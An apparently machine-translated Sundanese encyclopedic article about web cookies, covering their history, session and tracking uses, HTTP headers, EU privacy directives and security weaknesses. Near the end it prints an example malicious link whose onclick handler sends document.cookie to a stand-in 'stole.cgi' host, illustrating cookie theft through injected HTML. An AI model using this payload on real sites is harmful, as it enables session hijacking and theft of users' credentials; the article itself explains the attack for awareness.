in ,

Cookie Internet: Naon eta? Harti, Asal, Jinis sareng Privasi

Naon peran cookie, naon √©ta sareng naon jinis cookies? ūüć™

Cookie Internet: Naon eta? Harti, Asal, Jinis sareng Privasi
Cookie Internet: Naon eta? Harti, Asal, Jinis sareng Privasi

Un cookie atawa cookie wéb (atawa cookie, disingget jadi saksi di Quebec) diartikeun ku protokol komunikasi HTTP salaku runtuyan informasi dikirimkeun ku server HTTP ka klien HTTP, nu dimungkinkeun balik unggal waktos server HTTP sarua queried dina kaayaan nu tangtu.

cookie teh sarua jeung a file téks leutik disimpen dina terminal tina pamaké Internet. Geus aya leuwih ti 20 taun, aranjeunna ngidinan pamekar ramatloka pikeun nyimpen data pamaké guna ngagampangkeun navigasi maranéhanana sarta ngidinan fungsionalitas nu tangtu. Cookies sok jadi leuwih atawa kurang kontroversial sabab ngandung sésa informasi pribadi nu berpotensi bisa dieksploitasi ku pihak katilu.

Dikirim salaku lulugu HTTP ku pangladén wéb kana panyungsi wéb anu ngabalikeunana teu robih unggal waktos ngaksés pangladén. A cookie bisa dipaké pikeun hiji auténtikasi, hiji sési (pangropéa kaayaan), sarta pikeun nyimpen informasi husus ngeunaan pamaké, sapertos karesep situs atanapi eusi karanjang balanja éléktronik. Istilah cookie asalna tina cookie magic, konsép well-dipikawanoh dina komputasi UNIX, nu mere ilham ide jeung ngaran cookies browser. Aya sababaraha alternatif pikeun cookies, masing-masing gaduh kagunaan sorangan, kaunggulan sareng kalemahan.

Janten file t√©ks saderhana, cookies henteu tiasa dieksekusi. Aranjeunna henteu sanes spyware atanapi virus, sanajan cookies ti sababaraha situs nu dideteksi ku loba software anti virus sabab ngidinan pamak√© pikeun dilacak nalika aranjeunna nganjang sababaraha situs. 

Kalolobaan browser modern ngidinan pamaké pikeun mutuskeun pikeun nampa atawa nolak cookies. Pamaké ogé tiasa milih sabaraha lila cookies disimpen. Sanajan kitu, panolakan lengkep cookies ngajadikeun sababaraha situs unusable. Contona, toko karanjang balanja atawa situs anu merlukeun login maké credentials (ngaran pamaké sarta sandi).

Daptar eusi

Historique

istilah cookie asalna tina istilah Inggris cookie magic, nu mangrupakeun pakét data nu program narima tur mulih unchanged. Cookies anu geus dipaké dina IT nalika Lou Montulli ngagaduhan ide pikeun ngagunakeunana dina komunikasi wéb dina Juni 1994. Dina waktos éta, anjeunna padamelan ku Netscape Communications, anu parantos ngembangkeun aplikasi e-commerce pikeun klien. Cookies masihan solusi pikeun masalah reliabiliti palaksanaan karanjang balanja maya toko urang.

John Giannandrea sareng Lou Montulli nyerat spésifikasi cookie munggaran Netscape dina taun anu sami. Vérsi 0.9 béta tina Mosaic Netscape, dirilis dina 13 Oktober 1994, terpadu téhnologi cookie (tingali pos). Panggunaan cookies munggaran (non-eksperimen) nyaéta pikeun nangtukeun naha sémah ka situs wéb Netscape parantos nganjang ka situs éta sateuacanna. Montulli ngajukeun aplikasi patén pikeun téknologi cookie di 1995, sareng patén AS 5774670 dipasihkeun. dibéré taun 1998.

Sanggeus dilaksanakeun dina Netscape 0.9 beta dina 1994, cookies diintegrasikeun kana Internet Explorer 2, dirilis dina Oktober 1995.

Perkenalan cookies henteu acan dipikanyaho ku masarakat. Khususna, cookies ditampi sacara standar dina setélan browser, sareng pangguna henteu terang ayana. Sababaraha urang sadar ayana cookies kira-kira kuartal kahiji 1995, tapi masarakat umum ngan nyandak kana ayana maranéhanana sanggeus Financial Times diterbitkeun artikel dina Pébruari 12, 1996. Dina taun anu sarua, cookies narima loba perhatian média. kusabab kamungkinan intrusions privasi. Subyek cookies dibahas dina dua konsultasi Komisi Perdagangan Federal Amérika dina 1996 sareng 1997.

Ngembangkeun spésifikasi cookie resmi parantos dilaksanakeun. Diskusi munggaran ngeunaan spésifikasi resmi lumangsung dina April 1995 dina milis www-talk. Grup kerja IETF khusus dibentuk. Dua usulan alternatif pikeun ngawanohkeun kaayaan kana transaksi HTTP diusulkeun ku Brian Behlendorf jeung David Kristol masing-masing, tapi grup, dipingpin ku Kristol sorangan, mutuskeun pikeun ngagunakeun spésifikasi Netscape salaku titik awal. Dina Pébruari 1996, grup gawé nangtukeun yén cookies pihak katilu mangrupakeun ancaman signifikan pikeun privasi. spésifikasi dihasilkeun grup ieu pamustunganana diterbitkeun salaku RFC 2109.

Ti tungtung 2014, urang ningali spanduk ngeunaan cookies dina loba situs. Sahenteuna aya hiji ekstensi browser anu ngamungkinkeun spanduk teu ditampilkeun.

Jenis Cookies sarta Mangpaat

Manajemén sési

Cookies tiasa dianggo pikeun ngajaga data pangguna nalika ngotéktak, tapi ogé dina sababaraha kunjungan. Cookies diwanohkeun pikeun nyadiakeun sarana pikeun nerapkeun carts balanja éléktronik, alat virtual nu pamaké bisa ngumpulkeun barang-barang anu anjeunna hoyong mésér nalika ngotéktak situs.

Dinten ieu, aktip kawas carts balanja gantina nyimpen daptar item dina database dina server, nu leuwih hade; ti nyimpen aranjeunna dina cookie sorangan. Pangladén wéb ngirimkeun cookie anu ngandung ID sési anu unik. Panyungsi wéb teras ngabalikeun ID sési ieu dina unggal pamundut salajengna sareng barang-barang dina karanjang disimpen sareng dihubungkeun sareng ID sési unik anu sami.

Panggunaan cookies anu sering dianggo pikeun log in kana situs nganggo kredensial. Pondokna, pangladén wéb mimiti ngirim cookie anu ngandung ID sési anu unik. Lajeng pamaké nyadiakeun credentials maranéhanana (biasana ngaran pamaké sarta sandi). Aplikasi wéb teras nga-asténtikasi sési sareng ngamungkinkeun pangguna pikeun ngaksés jasa éta.

personalization

Cookies tiasa dianggo pikeun nginget inpormasi ngeunaan pangguna situs, pikeun nunjukkeun kontén anu pas ka hareup. Contona, pangladén wéb tiasa ngirim cookie anu ngandung nami pangguna anu terakhir anu dianggo pikeun log in kana situs wéb éta, supados nami pangguna tiasa dieusi sateuacana dina kunjungan ka hareup.

Seueur situs wéb nganggo cookies pikeun personalisasi dumasar kana kahoyong pangguna. Pamaké milih préferénsina dina bentuk sareng ngalebetkeun ieu ka server. Server nangkodkeun preferensi dina cookie sareng ngirimkeunana deui ka browser. Salajengna, unggal waktos pangguna ngaksés halaman situs ieu, browser ngabalikeun cookie sareng ku kituna daptar kahoyong; server lajeng bisa ngaluyukeun kaca nurutkeun preferensi pamaké. Salaku conto, situs wéb Wikipedia ngamungkinkeun para pangguna milih kulit situs anu aranjeunna pikaresep. Mesin pencari Google ngamungkinkeun para panggunana (sanaos henteu kadaptar) pikeun milih jumlah hasil anu aranjeunna hoyong tingali dina unggal halaman hasil.

nyukcruk

Nyukcruk cookies dipaké pikeun ngalacak kabiasaan browsing pamaké internét. Ieu ogé tiasa dilakukeun sabagian ku ngagunakeun alamat IP komputer anu nyuhunkeun halaman atanapi nganggo lulugu HTTP 'referrer' anu dikirimkeun ku klien sareng unggal pamundut, tapi cookies ngamungkinkeun pikeun akurasi anu langkung ageung. Ieu tiasa dilakukeun sapertos dina conto ieu:

  1. Upami pangguna nyauran halaman dina situs, sareng pamundutna henteu ngandung cookie, server nganggap yén ieu mangrupikeun halaman anu munggaran dilongok ku pangguna. Server teras nyiptakeun senar acak sareng ngirimkeunana ka browser sareng halaman anu dipénta.
  2. Ti momen ieu, cookie bakal otomatis dikirim ku browser unggal waktos kaca anyar situs disebut. Server bakal ngirim halaman sapertos biasa, tapi ogé bakal asup URL halaman anu disebut, tanggal, waktos pamundut sareng cookie dina file log.

Ku ningali file log, teras tiasa ningali halaman mana anu didatangan ku pangguna sareng dina urutan naon. Contona, lamun file ngandung sababaraha requests dijieun maké id=abc cookie, ieu bisa nangtukeun yén sakabéh requests ieu asalna ti pamaké nu sarua. URL anu dipénta, tanggal sareng waktos anu aya hubunganana sareng pamundut ngawenangkeun panyungsi pangguna pikeun dilacak.

Kuki pihak katilu sareng beacon wéb, anu dijelaskeun di handap, ogé ngamungkinkeun nyukcruk dina situs anu béda. Pelacak situs tunggal umumna dianggo pikeun tujuan statistik. Di sisi anu sanés, nyukcruk dina situs anu béda-béda nganggo cookies pihak katilu umumna dianggo ku perusahaan pariwara pikeun ngahasilkeun profil pangguna anonim (anu teras dianggo pikeun nangtukeun pariwara mana anu kedah ditingalikeun ka pangguna ogé pikeun ngirim email anu cocog sareng iklan ieu. - EMAIL SAMPAH).

Nyukcruk cookies mangrupakeun résiko invasi privasi pamaké tapi maranéhna bisa gampang dihapus. Kaseueuran panyungsi modéren kalebet pilihan pikeun ngahapus cookies anu terus-terusan sacara otomatis nalika nutup aplikasi.

cookies pihak katilu

Gambar sareng objék séjén anu aya dina halaman wéb tiasa aya dina pangladén anu béda ti anu nyayogikeun halaman éta. Pikeun mintonkeun kaca, browser nu ngundeur sadaya objék ieu. Kaseueuran situs wéb ngandung inpormasi tina sumber anu béda. Contona, upami anjeun ngetik www.example.com kana panyungsi anjeun, bakal mindeng aya objék atawa advertisements dina bagian tina kaca nu asalna ti sumber béda, i.e. ti domain béda ti www. .example.com. Cookies pihak "Mimiti" mangrupakeun cookies nu diatur ku domain didaptarkeun dina bar alamat browser urang. Cookies pihak katilu diatur ku salah sahiji objék kaca nu asalna ti domain béda.

Sacara standar, browser sapertos Mozilla Firefox, Microsoft Internet Explorer sareng Opera nampi cookies pihak katilu, tapi pangguna tiasa ngarobih setélan dina pilihan browser pikeun meungpeuk aranjeunna. Henteu aya résiko kaamanan anu aya dina cookies pihak katilu anu ngamungkinkeun fungsionalitas wéb, tapi ogé dianggo pikeun ngalacak pangguna. ti situs ka situs.

Parabot sapertos Ghostery sayogi pikeun sadaya panyungsi kalebet Google Chrome tiasa meungpeuk bursa antara pihak katilu.

Palaksanaan

Interaksi anu mungkin antara browser wéb sareng server anu nyayogikeun halaman wéb. Server ngirimkeun cookie ka browser sareng browser ngirimkeunana deui nalika nyauran halaman anu sanés.
Interaksi anu mungkin antara browser wéb sareng server anu nyayogikeun halaman wéb. Server ngirimkeun cookie ka browser sareng browser ngirimkeunana deui nalika nyauran halaman anu sanés.

Cookies nyaéta potongan leutik data anu dikirim ku pangladén wéb ka browser. browser nu balik aranjeunna unchanged kana server, ngawanohkeun kaayaan (memori tina acara kaliwat) kana transaksi HTTP disebutkeun stateless. Tanpa cookies, unggal dimeunangkeun hiji kaca web atawa komponén kaca web mangrupa acara terasing, bebas tina requests séjén dijieun kana situs sarua. Salian tiasa diatur ku pangladén wéb, cookies ogé tiasa diatur ku basa skrip sapertos JavaScript, upami didukung sareng diidinan ku browser.

Spésifikasi cookie resmi nunjukkeun yén panyungsi kedah tiasa nyimpen sareng ngirim ulang sajumlah minimum cookies. Sacara husus, browser kudu bisa nyimpen sahanteuna 300 cookies unggal opat kilobytes, sarta sahanteuna 20 cookies pikeun server tunggal atawa domain.

Numutkeun bagian 3.1 tina RFC 2965, Ngaran cookie anu case-insensitive.

A cookie bisa nangtukeun tanggal kadaluwarsa na, bisi nu cookie bakal dihapus dina tanggal ieu. Lamun cookie teu nangtukeun tanggal kadaluwarsa, cookie bakal dihapus pas pamaké ninggalkeun browser na. Ku alatan éta, nangtukeun tanggal béakna mangrupa cara sangkan cookie salamet ngaliwatan sababaraha sesi. Ku sabab kitu, cookies kalawan tanggal béakna disebut pengkuh. Hiji conto aplikasi: situs ritel bisa make cookie pengkuh pikeun ngarekam item nu pamaké geus disimpen dina karanjang balanja maranéhanana (dina kanyataanana, cookie nu bisa nujul ka entri nu disimpen dina database dina situs diobral, teu di komputer anjeun) . Ngaliwatan hartosna ieu, lamun pamaké ninggalkeun browser maranéhanana tanpa nyieun beuli sarta balik deui ka dinya engké, maranéhna bakal bisa manggihan barang dina karanjang deui. Upami cookies ieu henteu masihan tanggal béakna, aranjeunna bakal kadaluwarsa nalika browser ditutup, sareng inpormasi ngeunaan eusi karanjang bakal leungit.

Cookies bisa diwatesan dina wengkuan ka domain husus, subdomain atawa jalur dina server nu dijieun aranjeunna.

Mindahkeun halaman wéb dilakukeun nganggo HyperText Transfer Protocol (HTTP). Ku teu malire cookies, browser nelepon hiji kaca ti web server ku umumna ngirim aranjeunna téks pondok disebut pamundut HTTP. Contona, pikeun ngaksés kaca www.example.org/index.html, panyungsi nyambung ka server www.example.org sarta ngirimkeun pamundut nu siga kieu:

GET /index.html HTTP/1.1Host: www.example.org
Navigator‚Üíserveur

Server ngabales ku ngirimkeun halaman anu dipénta, dimimitian ku téks anu sami, sadayana disebut réspon HTTP. pakét ieu bisa ngandung garis instructing browser pikeun nyimpen cookies:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(halaman HTML)
Navigator‚Üźserveur

Server ngan ngirimkeun garis Set-cookie, upami server hoyong browser pikeun nyimpen cookie. Set-Cookie mangrupikeun pamenta pikeun browser pikeun nyimpen nami = string nilai sareng mulangkeunana dina sadaya pamundut ka hareup ka server. Upami browser ngadukung cookies sareng cookies diaktipkeun dina pilihan browser, cookie bakal diasupkeun kana sadaya pamundut salajengna anu dilakukeun ka server anu sami. Contona, panyungsi nyauran kaca www.example.org/news.html ku ngirimkeun pamundut ieu ka server www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
Navigator‚Üíserveur

Ieu pamundut pikeun kaca séjén ti server sarua, sarta béda ti mimiti di luhur sabab ngandung string anu server saméméhna dikirim ka browser nu. Hatur nuhun kana hartosna ieu, server weruh yén pamundut ieu numbu ka saméméhna. Server ngabales ku ngirim halaman anu disebut, sareng ogé ku nambihan cookies anu sanés.

Nilai cookie bisa dirobah ku server ku ngirim garis anyar Atur-Cookie: name=new_value dina respon kana kaca disebut. browser nu lajeng ngaganti nilai heubeul ku nu anyar.

Garis Set-Cookie biasana dijieun ku program CGI atawa basa scripting séjén, teu ku server HTTP. Pangladén HTTP (conto: Apache) ngan bakal ngirimkeun hasil tina program (dokumen anu diawalan ku header anu ngandung cookies) ka browser.

Cookies ogé tiasa disetél ku JavaScript atanapi basa anu sami anu dijalankeun dina browser, nyaéta dina sisi klien tinimbang sisi server. Dina JavaScript, obyék document.cookie dipaké pikeun tujuan ieu. Contona, pernyataan document.cookie = "suhu = 20" nyieun cookie ngaranna "suhu" jeung nilai 20.

Conto réspon HTTP ti google.com, anu nyetél cookie kalayan atribut.
Conto réspon HTTP ti google.com, anu nyetél cookie kalayan atribut.

Salian pasangan ngaran/nilai, cookie ogé tiasa ngandung tanggal kadaluwarsa, jalur, nami domain sareng jinis sambungan anu dimaksud, nyaéta normal atanapi énkripsi. RFC 2965 ogé netepkeun yén cookies kedah gaduh nomer versi wajib, tapi ieu umumna dileungitkeun. Bagian data ieu nuturkeun pasangan name=new_value sareng dipisahkeun ku titik koma. Contona, cookie a bisa dijieun ku server ku ngirim hiji garis Set-cookie: name=new_value; kadaluwarsa=tanggal; jalur =/; domain=.example.org.

Cookies kadaluwarsa teras henteu dikirim ku browser ka server dina kaayaan ieu:

  • Nalika browser ditutup, upami cookie henteu pengkuh.
  • Nalika tanggal b√©akna cookie geus kaliwat.
  • Nalika tanggal b√©akna cookie dirobah (ku server atawa naskah) kana tanggal nu geus kaliwat.
  • Nalika browser ngahapus cookie dina pamundut pamak√©.

Kaayaan katilu ngamungkinkeun server atanapi skrip sacara eksplisit ngahapus cookie. Catet yén mungkin ku browser wéb Google Chrome pikeun terang tanggal béakna cookie tinangtu ku ngaksés setélan eusi. Cookie anu disimpen dina komputer tiasa tetep aya salami sababaraha dekade upami teu aya prosedur pikeun mupus éta.

Stereotipe

Kusabab perkenalanna dina Intern√©t, seueur ide ngeunaan cookies parantos sumebar dina Intern√©t sareng dina m√©dia. Dina 1998, CIAC, tim ngawaskeun kajadian komputer Departemen √Čnergi Am√©rika Sarikat, nangtukeun y√©n kerentanan kaamanan cookie "dasarna teu aya" sareng ngajelaskeun y√©n "inpormasi ngeunaan asal-usul kunjungan anjeun sareng detil halaman w√©b anu anjeun kunjungan. parantos aya dina file log panglad√©n w√©b". Dina 2005, Jupiter Research medalkeun hasil ulikan, nu persentase signifikan r√©spond√©n dianggap pernyataan di handap ieu:

  • Cookies t√©h kawas virus, aranjeunna nginf√©ksi hard drive pamak√©.
  • Cookies ngahasilkeun bijil.
  • Cookies dipak√© pikeun ngirim spam.
  • Cookies ngan dipak√© pikeun iklan.

Cookies teu tiasa mupus atanapi maca inpormasi tina komputer pangguna. Tapi, cookies ngamungkinkeun pikeun ngadeteksi halaman wéb anu dilongok ku pangguna dina situs atanapi set situs anu dipasihkeun. Inpormasi ieu tiasa dikumpulkeun dina profil pangguna anu tiasa dianggo atanapi dijual deui ka pihak katilu, anu tiasa nyababkeun masalah privasi anu serius. Sababaraha propil anu anonim, dina harti yén maranéhna ngandung euweuh informasi pribadi, acan malah propil misalna tiasa questionable.

Numutkeun kana studi anu sami, persentase ageung pangguna Internét henteu terang kumaha ngahapus cookies. Salah sahiji alesan jalma-jalma henteu percanten kana cookies nyaéta yén sababaraha situs nyiksa kana aspék ngaidentipikasi pribadi cookies sareng ngabagi inpormasi ieu ka sumber anu sanés. Persentase badag tina iklan sasaran jeung email unsolicited, dianggap spam, asalna tina informasi gleaned tina nyukcruk cookies.

Setélan browser

Seuseueurna panyungsi ngadukung cookies sareng ngamungkinkeun pangguna pikeun nganonaktipkeun aranjeunna. Pilihan anu paling umum nyaéta:

  • Aktipkeun atawa mareuman cookies lengkep, amb√©h maran√©hanana terus ditarima atawa diblokir.
  • Ngidinan pamak√© pikeun ningali cookies aktip dina kaca nu tangtu, ku cara nuliskeun javascript: alert(document.cookie) dina bar alamat browser. Sababaraha panyungsi ngalebetkeun pangatur cookie pikeun pangguna anu tiasa ningali sareng selektif ngahapus cookies anu ayeuna disimpen ku browser.

Kaseueuran panyungsi ogé ngamungkinkeun ngahapus lengkep data pribadi anu kalebet cookies. Modul tambahan pikeun ngadalikeun idin cookie ogé aya.

Privasi sareng Cookies Pihak-katilu

Dina conto fiktif ieu, hiji parusahaan iklan geus nempatkeun spanduk dina dua situs web. Ku hosting spanduk dina pangladénna sareng nganggo cookies pihak katilu, perusahaan pariwara tiasa ngalacak navigasi pangguna ngalangkungan dua situs ieu.

Cookies gaduh implikasi penting pikeun privasi sareng anonimitas pangguna wéb. Sanajan cookies ngan dikirim deui ka server nu nyetel eta atawa ka server milik domain Internet sarua, hiji kaca web bisa kitu ngandung gambar atawa komponén séjén disimpen dina server milik domain séjén. The cookies nu diatur salila dimeunangkeun ieu komponén éksternal disebut cookies pihak katilu. Ieu kalebet cookies tina jandéla pop-up anu teu dihoyongkeun.

Perusahaan periklanan nganggo cookies pihak katilu pikeun ngalacak pangguna dina situs anu béda anu didatangan. Khususna, perusahaan iklan tiasa ngalacak pangguna dina sadaya halaman dimana éta nempatkeun gambar iklan atanapi piksel pelacak. Pangaweruh ngeunaan halaman anu didatangan ku pangguna ngamungkinkeun perusahaan pariwara pikeun nargétkeun kahoyong iklan pangguna.

Kamampuhan pikeun ngawangun profil pangguna dianggap ku sababaraha salaku invasi privasi, khususna nalika nyukcruk dilakukeun dina domain anu béda ngagunakeun cookies pihak katilu. Ku sabab kitu, sababaraha nagara gaduh panerapan cookie.

Pamaréntah Amérika Serikat ngalaksanakeun aturan anu ketat ngeunaan panempatan cookies di 2000, saatos diungkabkeun yén Kantor Kabijakan Narkoba White House nganggo cookies pikeun ngalacak komputer pangguna anu ningali iklan narkoba online. Dina 2002, aktivis privasi Daniel Brandt manggihan yén CIA ninggalkeun cookies pengkuh dina komputer nu kungsi ngadatangan situs web na. Sakali informed ngeunaan breach ieu, CIA ngadéklarasikeun yén cookies ieu teu ngahaja dikirim sarta ceased netepkeun aranjeunna. Dina tanggal 25 Désémber 2005, Brandt manggihan yén Badan Kaamanan Nasional (NSA) geus ninggalkeun dua cookies pengkuh dina komputer nu datang alatan update software. Saatos dibere beja, NSA langsung nganonaktipkeun cookies.

Di Inggris, éta hukum cookie ", diasupkeun kana kakuatan on May 25, 2012, obliges situs pikeun nyatakeun niat maranéhanana, sahingga ngamungkinkeun para pamaké pikeun milih lamun maranéhna rék ninggalkeun ngambah atawa henteu tina petikan maranéhanana dina Internet. Aranjeunna sahingga bisa ditangtayungan tina targeting iklan. Sanajan kitu, numutkeun kana nu Guardian, idin ti pamaké Internet teu merta eksplisit; parobahan geus dijieun kana syarat idin pamaké, sahingga sahingga tersirat.

Diréktif 2002/58 ngeunaan privasi

Diréktif 202/58 privasi sarta komunikasi éléktronik, ngandung aturan dina pamakéan cookies. Khususna, artikel 5, ayat 3 diréktif ieu ngabutuhkeun yén neundeun data (sapertos cookies) dina komputer pangguna ngan ukur tiasa dilakukeun upami:

  • pamak√© ieu informed kumaha data dipak√©;
  • pamak√© dib√©r√© pilihan pikeun nolak operasi gudang ieu. Nanging, tulisan ieu og√© nyatakeun y√©n neundeun data kusabab alesan t√©knis dibebaskeun tina hukum ieu.

Kusabab dilaksanakeun ti Oktober 2003, diréktif éta ngan ukur dilaksanakeun sacara teu sampurna dumasar kana laporan Désémber 2004, anu ogé nunjukkeun yén nagara-nagara Anggota tangtu (Slowakia, Latvia, Yunani, Bélgia sareng Luksemburg) henteu acan ngalihkeun diréktif kana hukum domestik.

Numutkeun kana pamadegan G29 taun 2010, diréktif ieu, nu utamana kaayaan pamakéan cookies pikeun tujuan paripolah paripolah, dina idin eksplisit pamaké Internet tetep pisan kirang dilarapkeun. Kanyataanna, paling situs ngalakukeun kitu dina cara nu teu sasuai jeung diréktif, ku ngawatesan diri ka basajan "spanduk" informing pamakean "cookies" tanpa méré informasi dina pamakéan, tanpa diferensiasi antara cookies "teknis". "nyukcruk" cookies, atawa pikeun nawarkeun pilihan nyata ka pamaké wishing ngajaga cookies teknis (saperti cookies manajemén karanjang balanja) jeung nolak "tracking" cookies. Kanyataanna, loba situs teu boga fungsi bener lamun cookies ditolak, nu teu sasuai jeung diréktif 2002/58 atawa diréktif 95/46 (Panangtayungan data pribadi).

Diréktif 2009/136/CE

Bahan ieu parantos diropéa ku Directive 2009/136/EC tanggal 25 Nopémber 2009 anu nyatakeun yén "nyimpen inpormasi, atanapi kéngingkeun aksés kana inpormasi anu tos disimpen, dina alat terminal palanggan atanapi pangguna diidinan ngan ukur upami palanggan atanapi pangguna parantos masihan idin na, saatos nampi, saluyu sareng Diréktif 95/46/EC, inpormasi anu jelas sareng lengkep, antara anu sanés ngeunaan tujuan pamrosésan. Ku kituna, diréktif anyar nguatkeun kawajiban saméméh nempatkeun cookies dina komputer pamaké Internet.

Dina pertimbangan awal dir√©ktif, anggota parlem√©n √Čropa netepkeun kumaha og√©: "Dimana sacara t√©knis mungkin sareng efektif, saluyu sareng katangtuan anu aya dina Directive 95/46/EC, idin ti pangguna ngeunaan pamros√©san tiasa ditepikeun ngaliwatan pamak√©an set√©lan luyu tina browser atawa aplikasi sejenna". Tapi dina kanyataanana, teu aya panyungsi dugi ka ayeuna ngamungkinkeun pikeun misahkeun cookies t√©knis anu penting tina anu pilihan anu kedah diserahkeun kana pilihan pangguna.

Diréktif anyar ieu dialihkeun ku anggota parlemén Belgian dina bulan Juli 2012. Hiji studi 2014 nunjukkeun yén sanajan anggota parlemén berjuang pikeun nerapkeun watesan diréktif.

P3P

Spésifikasi P3P kalebet kamampuan pikeun server nyatakeun kabijakan privasi, anu netepkeun jinis inpormasi anu dikumpulkeun sareng pikeun tujuan naon. Kabijakan ieu kalebet (tapi henteu dugi ka) pamakean inpormasi anu dikumpulkeun nganggo cookies. Numutkeun definisi P3P, browser tiasa nampi atanapi nampik cookies ku ngabandingkeun kawijakan privasi sareng kahoyong pangguna atanapi ku naroskeun ka pangguna, nunjukkeun pernyataan privasi kawijakan privasi anu dinyatakeun ku server.

Seueur panyungsi, kalebet Apple Safari sareng Microsoft Internet Explorer versi 6 sareng 7, ngadukung P3P anu ngamungkinkeun browser pikeun nangtukeun naha bakal nampi neundeun cookie pihak katilu. Browser Opera ngamungkinkeun pamaké pikeun nolak cookies pihak katilu jeung nyieun profil kaamanan global jeung husus pikeun domain Internet. Mozilla Firefox versi 2 turun rojongan P3P tapi dibalikkeun deui dina versi 3.

Cookies pihak katilu tiasa diblokir ku kalolobaan panyungsi pikeun ningkatkeun privasi sareng ngirangan tracking iklan, tanpa mangaruhan négatip kana pangalaman wéb pangguna. Seueur agénsi pariwara nawiskeun pilihan henteu milih mun iklan sasaran, ku cara nyetel hiji cookie generik dina browser nu nganonaktipkeun targeting ieu, tapi solusi misalna teu praktis éféktif, lamun eta dimangfaatkeun, sabab cookie generik ieu erased pas pamaké ngahapus cookies ieu nu cancels pilihan nu. kaluar kaputusan.

Kalemahan cookies

Salian masalah privasi, cookies ogé ngagaduhan sababaraha kalemahan téknis. Dina sababaraha hal, aranjeunna teu salawasna akurat ngaidentipikasi pamaké, aranjeunna tiasa ngalambatkeun turun kinerja situs lamun dina jumlah badag, aranjeunna bisa dipaké pikeun serangan kaamanan, sarta aranjeunna konflik jeung mindahkeun kaayaan wawakil, gaya arsitéktur software nu.

Idéntifikasi teu tepat

Upami langkung ti hiji browser dianggo dina komputer, dina masing-masingna aya unit panyimpen anu misah pikeun cookies. Ku kituna cookie henteu ngaidentipikasi hiji jalma, tapi kombinasi hiji akun pamaké, komputer, jeung web browser. Janten, saha waé tiasa nganggo akun, komputer, atanapi browser ieu anu gaduh panoply cookies. Nya kitu, cookies teu ngabedakeun antara sababaraha pamaké nu babagi akun pamaké sarua, komputer, jeung browser, kayaning di "kafe internét" atawa tempat nu mana wae nu mere aksés bébas sumberdaya komputer.

Tapi dina praktekna pernyataan ieu tétéla jadi fallacious dina mayoritas kasus sabab kiwari komputer "pribadi" (atawa smartphone, atawa tablet, nu leuwih goreng) dipaké utamana ku individu tunggal. ngaliwatan volume informasi dikumpulkeun anjog ka targeting pribadi sanajan jalma nu teu "nyaéta" dicirikeun.

A cookie bisa dipaling ku komputer sejen dina jaringan.

Salila operasi normal, cookies dikirim deui antara server (atawa grup server dina domain sarua) jeung browser komputer pamaké. Kusabab cookies tiasa ngandung inpormasi sénsitip (ngaran pangguna, kecap akses anu dianggo pikeun auténtikasi, jsb.), nilaina henteu kedah diaksés ku komputer sanés. Maling cookie mangrupikeun tindakan ngahalangan cookies ku pihak katilu anu henteu sah.

Cookies bisa dipaling via packet sniffer dina serangan disebut sési hijacking. Lalu lintas dina net tiasa dicegat sareng dibaca ku komputer sanés anu ngirim sareng nampi (utamana dina rohangan Wi-Fi umum anu teu énkripsi). Lalu lintas ieu kalebet cookies anu dikirim ngaliwatan sesi nganggo protokol HTTP polos. Nalika patalimarga jaringan teu énkripsi, pamaké jahat sahingga bisa maca komunikasi pamaké séjén dina jaringan ngagunakeun "packet sniffers".

Masalah ieu tiasa diatasi ku cara énkripsi sambungan antara komputer pangguna sareng server nganggo protokol HTTPS. A server bisa nangtukeun a bandéra aman bari nyetel cookie a; browser ngan bakal ngirim eta ngaliwatan jalur aman, kayaning sambungan SSL.

Sanajan kitu loba situs, sanajan ngagunakeun HTTPS komunikasi énkripsi pikeun auténtikasi pamaké (ie kaca login), engké ngirim cookies sési jeung data sejenna sakumaha normal, ngaliwatan sambungan HTTP unencrypted alesan efisiensi. Ku kituna, panyerang tiasa nyegat cookies pangguna sanés sareng nyamar kana situs anu cocog atanapi dianggo dina serangan cookie.

Scripting dina loka: a cookie anu sakuduna ngan bisa disilihtukeurkeun antara server jeung klien dikirim ka pihak katilu sejen.

Cara s√©j√©n pikeun maok cookies nya√©ta situs naskah sareng gaduh browser nyalira ngirim cookies ka server jahat anu henteu kantos nampi √©ta. Panyungsi mod√©ren ngamungkinkeun palaksanaan bagian kode anu dipilarian tina server. Upami cookies diaks√©s salami runtime, nilaina tiasa dikomunikasikeun dina sababaraha bentuk ka server anu henteu kedah ngaks√©sana. √Čnkripsi cookies sateuacan dikirim ka jaringan henteu ngabantosan serangan √©ta.

Jenis skrip situs ieu biasana dianggo ku panyerang dina situs anu ngamungkinkeun para pangguna masangkeun eusi HTML. Ku ngahijikeun bagian tina kode anu cocog dina kontribusi HTML, panyerang tiasa nampi cookies ti pangguna sanés. Pangaweruh ngeunaan cookies ieu tiasa dianggo ku cara ngahubungkeun ka situs anu sami nganggo cookies anu dipaling, ku kituna diakui salaku pangguna anu cookies dipaling.

Salah sahiji cara pikeun nyegah serangan sapertos kitu nyaéta nganggo bandéra HttpOnly; eta mangrupa pilihan, diwanohkeun saprak versi 6 Internet Explorer dina PHP saprak versi 5.2.0 nu rencanana nyieun cookie inaccessible ka klien deukeut naskah. Nanging, pamekar wéb kedah tumut kana akun ieu dina pamekaran situsna supados aranjeunna kebal kana skrip dina situs éta.

Ancaman kaamanan séjén dipaké nyaéta paménta fabrikasi dina loka.

Spésifikasi téknis resmi ngamungkinkeun cookies pikeun dikirim deui ngan ka server dina domain ti mana maranéhna asalna. Sanajan kitu, nilai cookies bisa dikirim ka server séjén ngagunakeun sarana lian ti lulugu cookie.

Khususna, basa skrip sapertos JavaScript umumna diidinan ngaksés nilai cookie sareng sanggup ngirim nilai sawenang ka server mana waé dina Internét. Kamampuhan skrip ieu dianggo tina situs wéb anu ngamungkinkeun para pangguna masangkeun eusi HTML pikeun ditingali ku pangguna sanés.

Salaku conto, panyerang anu beroperasi dina domain example.com tiasa ngirim koméntar anu ngandung tautan di handap ieu anu nunjuk ka blog populér anu aranjeunna henteu dikontrol:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Lamun pamaké séjén clicks on link ieu, browser nu executes onclick atribut bagian kode, ku kituna ngaganti document.cookie string kalawan daptar cookies pamaké nu aktip pikeun kaca ieu. Ku alatan éta, daptar cookies ieu dikirim ka server example.com, sarta ku kituna panyerang bisa ngumpulkeun cookies pamaké ieu.

